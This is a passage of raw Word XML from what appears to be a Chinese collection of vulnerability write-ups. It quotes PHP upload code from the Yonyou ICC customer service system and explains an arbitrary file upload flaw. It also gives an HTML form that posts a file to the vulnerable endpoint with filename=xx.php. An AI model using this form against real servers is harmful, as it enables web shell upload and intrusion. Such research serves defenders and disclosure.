                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-53"/>
                      <w:sz w:val="18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18"/>
                    </w:rPr>
                    <w:t>获取地址</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="2510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$operateId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intval(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$_REQUEST['operateId']); if(empty($operateId)) exit;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19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$operateId == 1){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$date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date(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"Ymd");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$dest = $CONFIG-&gt;basePath."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>data/files/".$date."/";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$COMMON-&gt;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createDir(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$dest);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//if (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!is</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>_dir($dest))</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-76"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>mkdir($dest, 0777);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$nameExt =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strtolower(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$COMMON-&gt;getFileExtName($_FILES['Filedata']['name']));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="3" w:line="650" w:lineRule="atLeast"/>
                    <w:ind w:left="915" w:right="1116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$allowedType = array('jpg', 'gif', 'bmp', 'png', 'jpeg'); if(!in_array($nameExt, $al</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>lowedType)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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$msg = 0;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empty($msg)){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 xml:space="preserve">$filename = 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getmicrotime(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).'.'.$nameExt;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$file_url =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73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urlencode(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$CONFIG-&gt;baseUrl.'data/files/'.$date."/"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filename);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spacing w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="1831" w:right="137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$filename = $dest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filename; if(empty($_FILES['Filedata']['error'])){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21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move_uploaded_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file(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$_FILES['Filedata']['tmp_name'],$filename);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9230" type="#_x0000_t202" style="width:319.25pt;height:489pt;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001" fillcolor="#d7d7d7" stroked="f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spacing w:before="156"/>
                    <w:ind w:left="1831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if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(file_exists($filename)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="1690" w:right="1509"/>
                    <w:jc w:val="center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//$msg = 1;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="1690" w:right="1207"/>
                    <w:jc w:val="center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$msg = $file_url;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="2748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@chmod(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$filename, 0444);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/>
                    <w:ind w:left="1690" w:right="1689"/>
                    <w:jc w:val="center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$msg = 0;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="183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$outMsg = "fileUrl="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.$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>msg;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="915" w:right="2564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SESSION[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"eoutmsg"] = $outMsg; exit;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2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if($operateId == 2){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="915" w:right="2564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$outMsg = $_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SESSION[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"eoutmsg"]; if(!empty($outMsg)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2" w:line="307" w:lineRule="auto"/>
                    <w:ind w:left="1831" w:right="2069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session_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>unregister(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"eoutmsg"); echo '&amp;'.$outMsg;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="4"/>
                    <w:ind w:left="1831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exit</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="915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}else</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="1831" w:right="3091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echo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"&amp;fileUrl=0"; exit;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="915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80020F">
                  <w:pPr>
                    <w:spacing w:before="71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function</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> getmicrotime(){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="360" w:right="1750"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>list(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>$usec, $sec) = explode(" ",microtime()); return ((float)$usec + (float)$sec);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/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w w:val="99"/>
                      <w:sz w:val="18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18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16"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18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4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="323" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存在逻辑错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以导致任意文件上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="323" w:lineRule="exact"/>
        <w:rPr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微软雅黑"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="23"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="用友ICC网站客服系统任意文件上传漏洞"/>
      <w:bookmarkStart w:id="53" w:name="_bookmark25"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用友</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="-123"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ICC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网站客服系统任意文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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Jannock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="24"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>/home/ecccs/web/5107/upload/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>screenImagesSave.php(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="50"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9229" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.9pt;width:337.5pt;height:442.05pt;z-index:472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/**</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="279" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>* screenImagesSave.php</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="279"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t>*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506" w:firstLine="98"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">*/ </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>require_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>once(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'../global.inc.php');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//get request.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 xml:space="preserve">$ft = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>intval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_REQUEST['ft']);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/*</w:t>
                  </w:r>
                </w:p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292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana"/>
                      <w:sz w:val="17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980"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>chdir(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$CONFIG["canned_file_tmp"]); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exec("rm -rf *");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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p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292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana"/>
                      <w:sz w:val="17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 xml:space="preserve">$date = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>date(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"Ymd</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2928"/>
                    </w:tabs>
                    <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="540"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$dest = $CONFIG-&gt;basePath.'data/files/'.$date."/"; if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(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>!is</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>_dir($dest))</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>mkdir($dest,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0777);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 xml:space="preserve">$filename = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>paramsFmt(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>urldecode($_GET["filename"]));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$nameExt =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proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>strtolower(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$COMMON-&gt;getFileExtName($_FILES['file'][' </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>name']));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$unallowedType</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-44"/>
                    </w:rPr>
                    <w:t xml:space="preserve"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46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'php',</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-44"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'jsp</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>',</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-44"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'asp',</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-44"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'sh',</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-42"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'pl',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850"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'js', 'jar', 'jad', 'class', 'java'); if(in_array($nameExt, $unallowedType)){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908" w:right="3655"/>
                    <w:jc w:val="center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$ft == '1'){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'pe';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</w:rPr>
        <w:t>传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的也同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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9228" type="#_x0000_t202" style="width:337.5pt;height:458.3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 xml:space="preserve"> if($ft == '2'){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'fe';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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exit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/*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573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(empty($filename)) $filename = date("Ymdhms")."</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>_noname.file"; echo $date."</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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filename;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*/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211"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$filenameNew = $dest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filename; if(empty($_FILES["file"]['error'])){</w:t>
                  </w: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move_uploaded_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>file(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_FILES["file"]["tmp_name"]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filenameNew);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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file_exists($filenameNew)){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echo(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>urlencode($CONFIG-&gt;baseUrl.'data/files/'.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$date."</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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filename));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@chmod(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$filenameNew, 0444);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$ft == '1'){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'pe';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 xml:space="preserve"> if($ft == '2'){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'fe';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5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="321" w:lineRule="exact"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>注意到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  filename</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>没有？有验证上传文件的类型，但保存的文件名却</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361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为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">filename GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="1999"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;form id="QuickSearch" name="QuickSearch" enctype="multipart/form-data" method="post"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑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76" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="泛微Eoffice_任意文件上传"/>
      <w:bookmarkStart w:id="55" w:name="_bookmark26"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>action</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑"/>
            <w:w w:val="95"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>"http://xxx.xxxx.com/5107/upload/screenImagesSave.p</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>hp?filename=xx.php"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342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&lt;input type="file" name="file"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact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&lt;input type="submit" name="QuickSearchBtn" value="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
